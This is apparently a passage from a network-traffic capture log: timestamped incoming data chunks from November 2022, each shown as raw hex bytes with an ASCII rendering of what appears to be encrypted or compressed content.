2022-11-07 22:49:10 UTC	10265	IN	Data Raw: 84 a0 68 4c 95 b0 48 80 ea 16 42 c1 3d 59 de 39 53 1c 00 7c b0 7d 91 3f 96 ee 37 36 21 e5 9f 7e 54 54 1f ca 7d a1 a7 28 e5 ab 32 7d 70 75 72 52 00 03 83 dc d1 a5 ea d8 71 0d 0c eb ae ac d2 dc 9c c9 78 6d e6 c0 3e 4f 91 ba 6d dd a8 ed 01 41 23 94 a0 76 c6 81 f2 c4 ce 09 db 46 0f b9 77 c4 70 2f a1 b4 58 37 a1 63 36 5f e1 e2 23 06 9e 15 e8 1b f9 89 fe 25 47 fa 42 c6 27 2d b8 b4 22 50 bd 3d 0a 5b 08 32 71 13 85 00 31 82 2a 2a b3 8b 03 f5 4b 4a 2d a7 42 f1 e0 ae ba 47 2f c9 2f 44 68 63 0e 07 96 4c 32 e1 92 fb 30 66 b4 09 3c 0d 65 e4 99 58 22 fa b3 c3 c0 7b 99 c0 2b b2 01 59 5b ac 62 d2 90 71 2b cb 04 08 14 77 7b 84 34 53 cc c5 5c 39 dd 13 0c 63 68 a8 23 e5 24 0e 3a 0d 4d e1 ed eb 60 fe 91 a2 d6 21 58 86 7c 2d f1 8b 3a e4 1d 27 b7 ab 16 2f 32 07 a5 10 37 1d 59 Data Ascii: hLHB=Y9S\|}?76!~TT}(2}purRqxm>OmA#vFwp/X7c6_#%GB'-"P=[2q1**KJ-BG//DhcL20f<eX"{+Y[bq+w{4S\9ch#$:M`!X\|-:'/27Y
2022-11-07 22:49:10 UTC	10281	IN	Data Raw: 88 8f 7d e1 5e 7c ee e5 19 6f fc fa 28 34 d9 0f 4a f7 fb a9 cb 9c 5f 0e 87 bb d3 2e d3 71 c5 38 1c 19 ba c4 69 03 f9 f7 89 90 ca a8 05 a5 cf 44 be 03 2b 56 9e af 00 ff 3c 41 a6 ad a9 9a f7 0b 57 f7 98 49 99 e3 31 da 71 ae b4 e9 fe 9c 94 36 71 99 e7 1b 41 c4 96 b1 ed 62 e5 ca 5f f1 6e 2b 6e 58 69 aa 1f 88 9c ac a1 fa 7b 20 33 f3 73 e4 5a 6f 40 56 8b dd b0 a7 08 a8 f1 b5 30 fb 4d 3a c3 84 dd 14 c4 c7 5a 05 9d 32 0e 31 9e ef a3 74 6e 78 0c 74 3f a6 b1 dd 00 46 97 46 c4 be 5e 32 42 08 34 f5 49 90 c7 82 0d f2 c5 32 95 5c ea 8c 1b bb bd 59 37 1f 9f 81 6f 60 3b c6 bd c5 c9 4e 53 db 58 3c bf 2f 24 c7 5b 61 54 88 66 f3 13 64 49 51 5b 6f 80 bf 4e 97 3b 62 4b f1 38 57 fb dd b9 2f 79 82 7e e2 e8 6d 23 8a 10 c0 0c 07 0b 05 f6 46 1c e4 93 98 96 92 73 9d 90 eb ca 5a 07 Data Ascii: }^\|o(4J_.q8iD+V<AWI1q6qAb_n+nXi{ 3sZo@V0M:Z21tnxt?FF^2B4I2\Y7o`;NSX</$[aTfdIQ[oN;bK8W/y~m#FsZ
2022-11-07 22:49:10 UTC	10297	IN	Data Raw: 60 0c 25 c4 ec 5f c4 92 79 c5 c8 56 07 c2 6b cb 24 a9 29 0e 54 03 5e cb 05 eb 06 46 50 6a d6 94 8e 66 9e cd d2 69 c2 91 0f 5f 92 1e 76 89 eb 62 94 8a 85 e0 ac 14 15 0f 3b a6 3f 21 64 1c 98 41 f9 de 40 a5 01 4a 54 f5 a0 bc 02 48 4c f7 4c c7 d2 97 75 35 49 5d 3c fd 66 20 11 7e 29 b0 c8 d0 d9 8f e7 e8 8a 63 8c 6c 18 9e df e5 da ff fa 6c 89 91 b7 3a 57 2a 28 30 a6 94 cc ea e7 59 f4 91 4e 16 07 56 87 47 f3 71 34 eb ba da 72 0f d0 9d 66 d2 8e d3 27 52 85 2e 51 1b a2 67 d9 4e 19 46 b2 7c 86 f7 72 cf 4e 30 19 cc 20 0d 32 db 70 68 ed 21 01 30 7e 46 73 62 fb 99 41 b6 c4 a6 4e 4f 17 17 80 8c 46 e1 09 a1 67 4f 7d ba a1 5b a6 74 16 27 45 99 7f 80 c6 c2 68 65 92 d1 5f 06 2c c9 0a aa f6 52 e8 8a 21 3d 13 77 5a 88 14 16 1e 4b 33 8f b8 58 35 ba 1f 58 1c b1 48 ae c1 d5 dc Data Ascii: `%_yVk$)T^FPjfi_vb;?!dA@JTHLLu5I]<f ~)cll:W*(0YNVGq4rf'R.QgNF\|rN0 2ph!0~FsbANOFgO}[t'Ehe_,R!=wZK3X5XH
2022-11-07 22:49:10 UTC	10313	IN	Data Raw: 48 65 3b 85 9c 51 f8 09 ad 11 5c cb 6e 80 ef a7 39 4b 40 05 55 82 f4 5a 66 2e e4 30 95 70 78 de 0a d6 e5 b4 e6 8a 6f 4f b2 37 f6 45 22 a0 f2 21 72 1e 25 6e 63 25 f8 1c 2e b6 d2 3c 18 ce 7b 7b cb 6f de 2d a1 c0 25 c8 84 a5 32 c4 1d 08 e1 42 f9 4e 18 7f 28 fc b7 32 04 7c bc 0c 30 6f db 5a 5f 87 c6 30 28 3f f7 0b 44 2b 92 09 bf 51 6a 94 05 7b 3d 7f 5e 0e 92 5f 29 9e 10 2a 0d 9d 36 ec 9a 96 26 90 c0 e8 10 66 c5 08 48 67 ea 09 b5 1f 87 b9 ce 43 57 99 22 e9 f6 ec 45 88 05 4a f3 2a 67 c8 32 6d ef ac 98 c1 c6 78 2e 55 d4 66 ff df b8 6b 24 e1 2a 4e d5 35 0e 05 b3 bc 71 d6 c8 f9 8f b9 bd d7 c9 16 bc 96 43 9b 94 72 7a 5e c8 d5 39 73 28 65 5a cc fe a3 5e 78 13 b6 0e 51 ef 4a 58 e6 5f 99 2b 3b 65 3c f5 ba 6d fe 05 69 85 a5 8e ae 14 b8 0c 85 c9 02 26 54 00 8a 25 c3 48 Data Ascii: He;Q\n9K@UZf.0pxoO7E"!r%nc%.<{{o-%2BN(2\|0oZ_0(?D+Qj{=^_)6&fHgCW"EJg2mx.Ufk$*N5qCrz^9s(eZ^xQJX_+;e<mi&T%H
2022-11-07 22:49:10 UTC	10329	IN	Data Raw: 89 07 fd 02 66 d2 50 09 75 72 33 fa ed b2 a7 d0 0c 26 9c fa 88 9c 53 6c a7 d5 07 b8 bc d7 cd 6b 3f 46 c5 5e 40 f1 9f 86 f7 9a f4 fe 5a 62 74 25 8c 40 9f 42 f3 23 f3 0b 4a 08 6e 84 d1 e0 3a a5 7d 54 ee a6 fe 47 ca 87 df b5 18 d5 7d f4 ce d2 fa 92 d6 1d 1c d3 b7 91 4b b9 d3 3b 54 b8 69 83 85 87 56 68 91 81 1b 8a 83 1a 41 76 82 29 89 0a df a0 f4 6c 2e 2c 16 e6 7d 74 0c 5f dd 00 63 87 d8 8f 69 12 55 b6 c3 4f f3 b0 de ea 85 a7 81 e4 9c 2d 4a 1c 43 40 e3 ce a6 c9 aa 37 f9 22 6c 4c a9 df 5a 71 1f 8a ef be 1c 2e 5a d5 d7 d1 77 14 f1 a4 7c 97 f8 38 de 0c 5a 30 de 58 8f 2e ca 26 53 ef 4f a8 7a a4 d3 39 2c b4 89 4e 1a ef ea 35 26 88 9f 6a 63 e3 e6 8d 8e 04 3b a3 d4 fe 22 47 f4 76 80 f8 67 52 34 1f 11 ac 85 11 ab 92 4b 42 62 7a 0e bc aa 6d c2 e5 cd bf 5f 2a a0 7b 12 Data Ascii: fPur3&Slk?F^@Zbt%@B#Jn:}TG}K;TiVhAv)l.,}t_ciUO-JC@7"lLZq.Zw\|8Z0X.&SOz9,N5&jc;"GvgR4KBbzm_*{
2022-11-07 22:49:10 UTC	10345	IN	Data Raw: 8e 36 8e 1c c3 2c 79 b5 5a 53 80 9f 9c 41 67 ab a3 1e 4e 94 6a fd d4 25 bc b4 df 48 e0 db 87 92 2b ef a2 c1 f0 c7 1b 86 b4 44 33 6e 3c d2 e9 dc d4 4c a7 14 60 16 e6 f3 7f 78 b0 8c 6e b6 a4 a0 d2 37 0c 16 a7 b9 cf 78 ed c8 2f 97 50 d4 f3 84 26 ee 97 05 df 4c 20 98 2a ce 69 b3 70 1a 19 b0 f5 30 2a ba 6a e3 ba 2f 06 f6 be 27 0f 14 45 dd 43 24 b7 7d cb 4a 1a 32 a0 1d b7 1d 15 2e a4 00 c6 fc d6 c8 05 74 56 15 c4 4f b3 0e 0d 67 ad 08 dd d5 ae d5 8d b0 d4 88 f2 86 35 fc cf 84 e1 f2 67 fa 5b 83 3b 6f e2 d2 b5 9f cf fd 36 bb 0f bd 44 f0 67 81 57 c0 16 dd 29 84 d1 95 06 30 c5 b4 26 f0 21 af 43 82 c2 c2 68 13 ac 59 a5 7b 76 70 38 52 0a 95 da 2b 22 08 dc d8 a5 0f c6 10 47 0a 42 e7 5e b4 96 a3 12 df 71 0b c8 d9 51 1c d0 1c 0a 52 bc e1 29 aa fc ee 1a 13 b1 51 56 7a 5b Data Ascii: 6,yZSAgNj%H+D3n<L`xn7x/P&L ip0j/'EC$}J2.tVOg5g[;o6DgW)0&!ChY{vp8R+"GB^qQR)QVz[
2022-11-07 22:49:10 UTC	10361	IN	Data Raw: ee 73 bc 89 a5 14 23 0a 4d 41 1d 95 cf c2 81 fc 4b cb 4c cb 7f 63 0d 57 ec cd 77 a9 1e 62 71 12 9b 9c 3c 1c 21 4b f8 37 23 0a c9 93 df dd d2 08 77 57 7e 2d 9a 6d aa 94 17 77 91 49 7c 7e e6 4f dd 6d a9 3c 1d ef 1d a3 14 e6 a5 52 28 ad 8c 4f cd ff 83 b6 a4 02 be 7c ec d1 ef d0 e6 21 91 db 86 fd 22 55 a1 05 ad c8 d8 c1 0b 5d ab 98 db 60 b9 86 ba c5 e1 71 66 6d 47 aa c9 23 ee 19 d2 35 63 15 69 e5 30 6a 8f d7 21 cf 19 0b 2e b5 6b 7f 2d 6a b8 95 66 6d 33 2d ac cd a9 96 a1 fb 18 ea c8 97 be f0 67 4f 9b c3 04 93 f6 e2 19 d0 6c db 46 ef 53 e6 1b 7d cb 4b 83 f6 a5 2a 8a 38 f8 8f 62 f3 7c b5 5e 7d be 14 b5 33 13 ba bd 80 e3 89 ec df 9f dc d1 15 17 aa 98 6c bb 68 1a f4 cf af cc a8 1f 5a 76 99 a3 da 29 81 6f 68 24 71 70 b7 5d 8c 66 60 9b 69 79 43 03 d8 db 32 ef ca 57 Data Ascii: s#MAKLcWwbq<!K7#wW~-mwI\|~Om<R(O\|!"U]`qfmG#5ci0j!.k-jfm3-gOlFS}K*8b\|^}3lhZv)oh$qp]f`iyC2W
2022-11-07 22:49:10 UTC	10377	IN	Data Raw: ac 53 8a 56 0a a3 fd ce 81 31 53 8d 15 2e 8d 18 9d 4b 1d 8f c8 9c 47 5c eb 13 46 48 00 e2 61 0d 6e a7 b6 aa b0 eb e7 82 62 79 14 2d 09 66 79 3d ac 78 8b 59 1f 0e 4d 58 68 1b d0 29 ec d8 f6 bf 6c cc 1c 01 20 43 73 81 34 55 e8 e0 48 13 89 84 dc e7 55 85 23 81 39 1a ed ed dd 0e 2b ec ed cd 43 f6 fc b5 de 17 c7 00 85 ec 03 af 35 49 41 63 dd eb 4a 04 33 dd ea 3f 79 15 f1 a1 7c ea 7c d8 bc 12 d3 cd e6 5f 57 50 44 25 0f c3 05 16 99 27 35 be 2b b7 af 7b 5b d8 b1 80 7e 46 3d 43 56 cb 2e c7 c5 c2 bc 7a f1 af 2b ee 58 00 88 e9 b6 82 5c 98 06 5e a0 3e a3 a2 e6 ed 9c b5 8e 76 2b 58 ee 4f c4 5c 81 f3 e1 66 4c 3a c2 9e 52 17 20 8d f3 6d 38 ff d5 ca 6a b2 8c df 84 11 52 7e 53 d0 cc 1a f2 60 77 d2 78 75 8a 4b bb 69 6a a1 f8 7e 3f 41 36 73 c0 8e 9d 87 d1 bf aa b1 c7 f6 34 Data Ascii: SV1S.KG\FHanby-fy=xYMXh)l Cs4UHU#9+C5IAcJ3?y\|\|_WPD%'5+{[~F=CV.z+X\^>v+XO\fL:R m8jR~S`wxuKij~?A6s4
2022-11-07 22:49:10 UTC	10393	IN	Data Raw: eb cc 4c 65 b8 eb a4 8e b3 6d 1a 18 3d 6d a2 b4 c7 8f 23 94 8f 86 53 e0 44 6e f7 ee f9 17 dd 1a c0 3d 94 f8 bb a3 82 46 e1 e4 bd fd 25 81 ad 96 f3 b1 c8 42 10 72 d2 21 83 9f 9a fc e3 7b 70 f2 fd d7 5f 82 f5 6a 22 d4 27 64 c0 e1 54 5f f6 89 e1 37 f4 bb 24 ca 84 a1 74 a0 85 50 07 a6 de 6d 72 dd f3 59 49 dd b1 25 de 23 b4 49 80 af c6 5f 25 69 fe 2d 9c a1 03 fa 64 09 c2 38 c2 17 47 e6 04 51 da 34 81 1e e4 3a 00 18 ac d1 98 f5 bc ee a4 84 8d 48 29 38 bc 55 38 50 39 8c 97 f6 85 45 bd 29 72 42 c0 af 9e 6c 53 aa d9 7a 8d 11 46 17 e2 d5 61 9a 91 2a 17 10 80 37 c5 96 c4 6c ba 81 2e f4 76 45 12 b3 6d 1b 71 e7 82 03 b8 f1 5e dd f6 35 bd f3 28 b6 35 8d be f8 91 c1 94 b3 70 ae 38 55 ae ba 79 3a ab c4 f3 a2 eb 3e a5 25 32 0c 80 b4 b0 bb 51 9e c9 44 85 db 32 b3 62 13 31 Data Ascii: Lem=m#SDn=F%Br!{p_j"'dT_7$tPmrYI%#I_%i-d8GQ4:H)8U8P9E)rBlSzFa*7l.vEmq^5(5p8Uy:>%2QD2b1
2022-11-07 22:49:10 UTC	10409	IN	Data Raw: fa b2 6f c1 97 16 24 fc 68 55 0f 33 d1 f4 67 ae 50 be e7 9c c0 27 35 9d c6 3e e2 11 a2 ef 23 0e d0 d2 3b 8f 59 2e 0f 16 a9 26 e8 3e 0d d7 dd 5f 0f 7a 61 f7 20 12 be d8 f5 be a6 18 f2 b9 54 1b b6 57 dd e5 0c 73 ba 0a eb 05 87 34 0e ee 6f 1b e5 7f a5 1b b6 a4 61 94 80 6d d5 f0 52 14 31 74 89 0b 8f ab 17 49 ed 4d d8 b8 3d cb 75 e7 9a 1a 40 f2 f8 b6 68 27 6c b6 05 3b 9f 9c 99 9a 2c 10 8f 2c dc e7 c2 f8 55 7e 71 6e bf ea b5 c6 ce cc 80 d9 19 24 9a 25 50 bc d0 9a a4 be 3c 97 6d cc a3 79 08 c5 56 d2 73 32 79 37 63 fa 07 2d 45 16 7a a4 58 fa 14 ad fe 2c 07 8e 34 0f 9e 7f 33 55 90 53 ea d2 de 9e db a8 d6 b8 b9 c6 d3 65 21 8b 4d 24 26 8c d6 40 9d 0a 01 e9 19 99 ba ce cb c3 cc f4 78 d8 f3 33 59 1d 68 06 60 09 25 a1 db 36 56 ca 7a 81 ac 4e 24 33 8b bc 5c ee 1f 0c bb Data Ascii: o$hU3gP'5>#;Y.&>_za TWs4oamR1tIM=u@h'l;,,U~qn$%P<myVs2y7c-EzX,43USe!M$&@x3Yh`%6VzN$3\
2022-11-07 22:49:10 UTC	10425	IN	Data Raw: 36 d9 b6 78 2c 11 b5 a3 4d 5e bd a6 80 09 f3 99 20 3b ce 09 4a 94 2c 2a 01 28 8d 72 95 bf 19 84 75 7a 79 5d 80 ad 9e 0e f6 06 18 3b a6 56 69 71 4c e1 18 05 32 c6 9a e2 e9 52 9e 8a 07 f6 6f 27 a4 f4 3d 68 7d 94 5c 3c 77 bc ef 2a cb 47 27 34 af 33 0e 9c 05 d2 7e e8 d7 c6 b8 74 e1 2b 32 53 34 78 f7 6e 5d c0 83 e8 5b 0e 98 da 49 de c7 18 90 e8 69 0a ae af fe f8 11 79 26 54 04 40 a6 13 de 48 41 32 e0 8c ba d7 31 0d b1 0c 7d 2c c9 df 2b 19 a8 b2 1a 32 0b a0 0d 36 7c a7 26 3d 8f d1 4f 3b 30 f4 ad 0b c7 07 49 7a f6 61 4c ee a9 a5 43 46 b2 87 60 8a df 3e 5d 16 98 b2 3b 20 0e 3b a5 00 97 04 0a 0e d2 4b 50 7c ce cb 74 72 dd 47 5a 1c e8 f3 0b bd 87 4c eb 96 87 20 28 1e 59 91 74 30 3e b5 ba a8 e3 51 bf 03 26 d3 c3 9b 64 65 f1 3b d5 49 65 a5 0d 65 d0 99 fe 84 9d ac 93 Data Ascii: 6x,M^ ;J,(ruzy];ViqL2Ro'=h}\<wG'43~t+2S4xn][Iiy&T@HA21},+26\|&=O;0IzaLCF`>]; ;KP\|trGZL (Yt0>Q&de;Iee
2022-11-07 22:49:10 UTC	10441	IN	Data Raw: 04 a3 e7 0f a3 98 59 0b 7f 05 7f d0 63 47 a3 a9 5f 31 ba 45 6b d9 dd e4 14 6d ee 2e 80 5b 3b a7 d5 19 01 2e 88 f4 b2 e5 ac 3c 62 be e8 d7 9a 7f 7b 6f ff 72 5e c0 98 f2 ac 3a ce 36 bc 2c 2c d0 00 f0 bc a4 39 af ea 1b 4b de 85 d1 cf 02 9a 75 fe bc 46 18 15 a2 b6 93 06 c8 6c 61 90 47 8b e6 54 1c de df d5 2c bb 01 ec 96 59 f5 f9 b2 88 7f 21 d9 a7 e4 48 d6 19 bc fe 23 57 37 3a e7 4a b2 df dd 34 ac 7b 14 ed dd 9a 66 2b ff 06 90 73 6e eb 03 5e 37 9e 87 53 34 c5 d6 c9 dd 73 97 b5 04 40 e3 ac 06 5b 1a 59 a5 c6 be c8 4d ed b5 c6 59 76 0e 4f e9 27 53 68 e8 1a 5a 88 af 5c 96 2c 25 e9 fb 6b d4 c0 fa 3a 60 d7 74 1a 9a e1 d8 fc b6 53 91 c9 7f 6e cd fb 2c 91 57 09 17 f8 c6 db 69 3c 5e 47 e7 e2 3c 8f 5f d3 a2 f0 ff ab c1 1f 65 80 34 f9 16 3d 10 0f 3f 38 b5 1b ec dd 76 91 Data Ascii: YcG_1Ekm.[;.<b{or^:6,,9KuFlaGT,Y!H#W7:J4{f+sn^7S4s@[YMYvO'ShZ\,%k:`tSn,Wi<^G<_e4=?8v
2022-11-07 22:49:10 UTC	10457	IN	Data Raw: 35 2e 1f e9 c3 3a 17 20 f6 6d 70 66 fe 9d 17 37 4b b6 17 9f a6 f6 1a 49 41 15 0b 23 d6 6a 5a 92 d7 50 51 2b 9f 4b 45 9f a6 c8 83 24 6b 92 2a c4 44 b9 f4 4c b9 9d 5b 2e 71 6e c5 a5 56 b8 9d 2b 78 11 eb 55 63 22 42 02 d7 7f a2 47 d5 ca 25 57 34 4e 1b 1c de 3b ff 20 28 66 8b 0f 1f db f3 b5 da 2d dc 16 98 c0 a2 c5 61 12 2f 09 5b 55 aa 8c a9 db a8 f5 c0 45 f2 50 32 cb 3d a7 e8 22 bc 00 b6 c1 b2 31 5b e0 11 a3 61 cc 04 d4 c7 72 75 16 ce 57 3b da 0e f8 89 62 9e 0f 03 5b 92 a6 7c cd ea 63 df 35 63 09 7b 1b 37 e6 38 94 4d 43 f3 fd 4d 38 47 1c f5 ac 56 98 5e c6 eb d2 f2 e7 cc ce cd 33 19 0c 1e 13 0d 4b 63 7d e9 c9 e4 a9 57 e5 e4 8c 15 67 74 cd 50 59 c6 8c c9 54 5f 0e e2 01 f9 ae 9a 7a 80 1a e0 f5 75 fe ba fc 68 d8 e8 62 05 bb 2b bd a3 70 ee 11 b3 f6 4a 99 bc fe 00 Data Ascii: 5.: mpf7KIA#jZPQ+KE$k*DL[.qnV+xUc"BG%W4N; (f-a/[UEP2="1[aruW;b[\|c5c{78MCM8GV^3Kc}WgtPYT_zuhb+pJ
2022-11-07 22:49:10 UTC	10473	IN	Data Raw: 4f 94 70 c8 e5 c4 2b 2a 76 84 12 24 c8 5e 09 32 e3 0f 57 32 32 7b b5 13 ff dc 5f 93 77 0a 39 be 5a dd 4f 66 bb a5 ab c8 4a 91 51 7d 26 df 2a 2a fd 45 a8 9e 27 ec fb b3 20 e2 11 2a b8 96 bb 21 1e 23 8c 69 ce 6f 0a 91 b1 98 7c 14 9f 80 c5 b9 7f 8d 5c f8 38 0b db 5e 18 d5 99 e8 a1 99 0a fa 20 08 2c f9 3f 27 a0 c2 b1 0f 93 e2 25 2a 1d 45 34 13 14 83 de 19 9f 20 aa 4d f4 4a e5 ea 4e c3 97 0f 94 f7 d9 09 6e 41 b8 e5 f1 a7 3b 08 88 1f bf f9 4f 91 3a ef ea 30 e8 9e 2a 80 21 2a 14 f0 87 e1 1b 26 62 4c 5e 37 a9 82 0a 69 4d cf 1c 5b f7 d9 e2 af a0 ac 5a f6 64 1f 5d 3f f1 b7 d3 be da 93 0f 8c 53 de 14 b3 dc f8 bc eb c0 b6 ff e3 3f d9 d1 ca 36 4c 97 3a b9 5c 9d 82 06 a3 b9 d0 83 6d 35 c3 6a 5e 44 20 1c e2 c3 ff 72 2d 57 ae d3 f2 da f7 57 74 d7 49 68 5d e6 63 78 df a2 Data Ascii: Op+v$^2W22{_w9ZOfJQ}&E' !#io\|\8^ ,?'%E4 MJNnA;O:0!*&bL^7iM[Zd]?S?6L:\m5j^D r-WWtIh]cx
2022-11-07 22:49:10 UTC	10489	IN	Data Raw: 97 51 94 c0 dc aa 18 0c d8 65 ed 70 6c b5 0b 62 54 78 c4 87 52 3d f8 11 36 b9 eb 56 cb 55 6f bb b6 6f 9b 62 b2 95 11 e7 d8 d6 5c 81 23 76 00 bc 24 67 96 6c 55 75 26 18 92 71 9b ad 8b 0a 54 33 aa 4c 82 75 11 64 63 46 8c f8 e6 d8 24 b7 c4 7d fd 25 8d 34 84 e4 ea 1c b5 40 6e b2 75 fe c2 d6 84 33 f1 63 96 24 4a db 0a 91 c5 98 ac 01 03 be eb 89 48 c1 df af c1 be d1 b5 e3 4a aa b3 ed ca f6 2b 15 70 a1 2d 3a 7e f0 1c cc ac dc 08 6b 66 bc 02 e4 d6 db 59 5c 53 ad 1c 4b 9c 9e 2c b8 eb 92 db 14 6d 71 b3 20 00 67 c5 fa a3 ae 69 66 88 c4 22 ae fe b1 d8 1d 88 8d 01 1f e2 ec d3 f9 54 13 14 a7 8e 43 e8 93 7e 0b a7 ae 3d ce 8d fc f3 cb de 00 3c 79 0a 94 3a a8 97 27 11 fa 21 ef a3 c7 e4 f0 1a a8 cb 18 e9 f4 77 37 24 49 fc e7 49 5a 64 c9 02 ae 3b 77 24 83 c7 f3 61 46 3d 45 Data Ascii: QeplbTxR=6VUoob\#v$glUu&qT3LudcF$}%4@nu3c$JHJ+p-:~kfY\SK,mq gif"TC~=<y:'!w7$IIZd;w$aF=E
2022-11-07 22:49:10 UTC	10505	IN	Data Raw: 7b 4d f4 f2 e2 4d 2c 3b 35 e2 d6 46 f6 8a f3 9a 5b d9 19 ce 09 77 ca 06 5b e2 97 a3 b6 ba 34 e9 af b4 86 e6 63 93 f5 b7 e7 a1 75 2b 56 cd ca d5 96 84 37 db 94 75 51 1b 5d 19 55 9b fa 4d b3 58 7d 7c d2 40 1b c1 82 76 81 e1 03 39 ed 7c 6e 15 10 ec 2c e9 9d 4f 6e 3b 22 2c 9d e8 f4 1f 30 8d ca 25 cd 5e b5 68 a1 bb 3a b8 8c a2 02 13 3a 5c e1 94 64 fc 2b 32 2b f4 7f dd cf ad b4 fb cf 44 00 64 dd dc fe 2d d2 12 02 19 a9 e4 cc 62 d8 7b c7 3c 25 78 df 4a cc 08 8e bb 9b 64 ea bf 0f ef 55 0b 56 87 b1 88 76 e8 cf aa ff 37 ab 5a 67 32 2d 9a 58 c8 04 cf cf a1 e9 2c 6d 66 1b f4 15 97 32 13 ec 1e b5 92 e8 ef 6d d4 4e 3d ab b5 1c 13 15 70 fa 65 07 b6 75 61 1f ac 05 73 2f 4b 82 cd 4d 37 e5 7e 8c 3e df 92 c3 9b 6c 53 d9 15 f9 e1 4b f7 97 80 8e f0 31 4f 8f 99 88 c8 13 e4 a0 Data Ascii: {MM,;5F[w[4cu+V7uQ]UMX}\|@v9\|n,On;",0%^h::\d+2+Dd-b{<%xJdUVv7Zg2-X,mf2mN=peuas/KM7~>lSK1O
2022-11-07 22:49:10 UTC	10521	IN	Data Raw: 82 b0 18 86 2f 05 6b 02 5f bb 63 2f 59 2d 8b 0b 9a 93 60 81 04 d3 5a 47 53 a5 08 b8 4c bb 2d 7b cd 1a 84 2f f4 ff 38 f2 10 7c bb bf b3 53 7e d2 54 b9 0c a7 e3 8d 15 b5 e1 95 5a 3b e1 a3 f6 99 d7 bc 70 1b f2 64 f1 5f a6 fd f0 2c 9b a6 53 6a be 7a 30 9e 1e b8 4d 22 56 35 0c 69 7f 76 08 7d 9c f9 ae e5 a3 b0 5c 0b 05 2b 1e df 75 8b f9 30 03 47 df 06 4e f5 44 b8 34 0a 7a 4d 50 fd 5b a8 e5 67 7a 95 4d cd 00 36 a8 45 26 01 df d8 6d 97 7e 1c 3e 3e 27 41 35 db a3 87 05 8b 09 6c d8 a7 9d d1 70 7d f4 79 2f 55 8a 2f bf ea 01 63 ac 07 5d 8e 73 89 1b c2 55 b4 19 ee 38 9e a7 94 88 ff df 28 1a 14 ae 39 f0 97 c8 f4 f8 97 ea 8c 3e 87 b7 80 66 05 7b 67 67 b7 b3 fb e6 29 5d 6d d0 fa 9c 3c 24 77 5c c4 50 09 f7 63 0b 9d 99 ab 89 85 2e 14 3a bc 58 42 30 b5 c8 f3 89 e6 6b 24 20 Data Ascii: /k_c/Y-`ZGSL-{/8\|S~TZ;pd_,Sjz0M"V5iv}\+u0GND4zMP[gzM6E&m~>>'A5lp}y/U/c]sU8(9>f{gg)]m<$w\Pc.:XB0k$
2022-11-07 22:49:10 UTC	10537	IN	Data Raw: 48 3a 5a e1 4d 44 ce b5 a9 58 a6 35 9d 34 f8 4a b3 44 9a f3 53 32 e0 0a 66 40 87 52 0f 25 3f ab 8d ca 3a 78 5d 92 b4 34 17 00 9c fd 91 5f 0d 0b 4a a9 6d 77 81 22 64 24 8b c0 67 b8 aa e1 ad 01 74 3b 82 94 f2 35 2c d3 b0 1c f9 bc 04 b7 7b c7 19 ac 98 11 fe 37 eb 96 d1 92 76 2f 5c 0d 1f 25 f8 21 47 62 eb db e2 a5 3e a5 24 ef 2d 6e 7f aa cd e7 57 2f cc e7 b4 8a 24 9c 1e a7 32 01 dd 64 5f 03 68 ce 1d a1 83 db 53 63 0f be b7 98 7d ba 25 c4 ab 5b 7e 8d 9b 3d f5 a0 65 bb 0d 70 c6 90 43 71 c2 ce 87 1a da 84 d6 f0 a3 b7 9a 59 18 56 b6 f1 f8 47 7c c9 3b 44 99 d7 7a ed 92 8c 95 2a b3 41 15 e2 de b8 7d 5e 9e 0f 0e 81 fc d6 7b 57 dc 6d 7e 24 da d5 68 6f c9 fe 42 03 64 c0 3f 0c 35 f1 d4 50 15 77 c0 81 17 c7 62 7f e7 67 da 03 21 7c e5 3c 7f 63 9f 30 4d 9b 25 fd 08 44 f1 Data Ascii: H:ZMDX54JDS2f@R%?:x]4_Jmw"d$gt;5,{7v/\%!Gb>$-nW/$2d_hSc}%[~=epCqYVG\|;Dz*A}^{Wm~$hoBd?5Pwbg!\|<c0M%D
2022-11-07 22:49:10 UTC	10553	IN	Data Raw: a0 c6 93 d9 b8 9b a0 d0 ab 4c 3c 23 2f c7 3a 21 a3 ed 27 f8 7c 9b 96 69 47 74 ae 4e 14 91 bd be 29 3e 41 28 65 c4 6c 69 d2 cb 73 4f 22 95 c5 8b 4f a6 54 5d 92 27 84 49 78 41 76 8c 94 6b 09 8b 65 05 da 29 89 56 13 c6 da 6e 4b 8b b7 09 41 e5 ad 88 da 05 13 89 3f f8 22 f6 b0 86 d8 81 db b3 ff ce 90 2e 30 68 6a 37 52 9d 82 5f 77 95 01 3c 14 69 76 86 22 f5 af 0b 8d b8 aa 8b 52 01 c4 0b 2c 4d 5a bd fc b7 fc 25 db d0 52 0e 3d f9 e4 8f 78 9f 9f d5 ff e7 b5 2c e9 3a ca 85 ee 32 53 9e da bc 30 85 cc 78 45 79 ee c6 68 9e e8 40 b5 a1 cd 75 d4 f9 c8 d1 9c 13 86 ea 4b e6 05 57 bf 4a 52 bd c2 27 ca 02 4a e3 e5 01 a5 19 98 db 82 57 80 81 e7 4b 7a 00 89 97 27 0a 1c a6 c3 15 7a 86 a7 07 2b c0 f3 45 12 dd 1f 15 04 c4 ea 7b 08 a2 aa 96 04 b8 a8 d4 ee 0a 0a d5 4a 1c a6 c9 9f Data Ascii: L<#/:!'\|iGtN)>A(elisO"OT]'IxAvke)VnKA?".0hj7R_w<iv"R,MZ%R=x,:2S0xEyh@uKWJR'JWKz'z+E{J
2022-11-07 22:49:10 UTC	10569	IN	Data Raw: 74 a1 aa 40 29 a7 03 00 88 b0 05 e4 36 17 f8 eb ca c5 a6 35 66 f3 bc 34 66 cf 4e 49 5f 38 e7 df 7f f6 fc 31 7b 7e ad 9c 21 8b b6 2f 29 31 22 b5 fd 1e f8 88 db 86 05 d9 8b 32 dc c3 2d 51 c0 ff 99 49 18 7a 69 27 69 aa ab 36 c1 b2 8f ef f0 4b 89 91 d5 c2 1e 2a 90 5b a4 e8 33 2c 77 0e 27 1a 73 4f 02 01 fe 0b 6d c3 1a d1 ce ea 5a 40 ca cd 45 28 cb 43 e9 49 85 bc 90 28 ef 49 b4 95 a0 b4 72 3b 51 87 c3 88 f3 04 18 95 1f 4b 75 70 96 79 94 cb d5 58 8c f4 76 09 68 64 d1 8e 66 5a 72 ff 53 b3 12 1a 69 03 28 9d ab 3d 96 5d 32 c3 96 fa 4d e5 6e 9e 4f 0b 22 f6 e4 4d cb 74 62 4f 4c 97 d1 03 2e 14 97 3f 44 e8 e0 c5 07 38 f0 ad 90 0c 6c be 9d 4a 96 87 f8 cf 36 88 e8 51 a1 a0 73 34 ee 46 fa 95 1d 4b d5 98 fe b3 2b 21 e3 2b 22 20 7e 78 30 8b f0 3e be 11 10 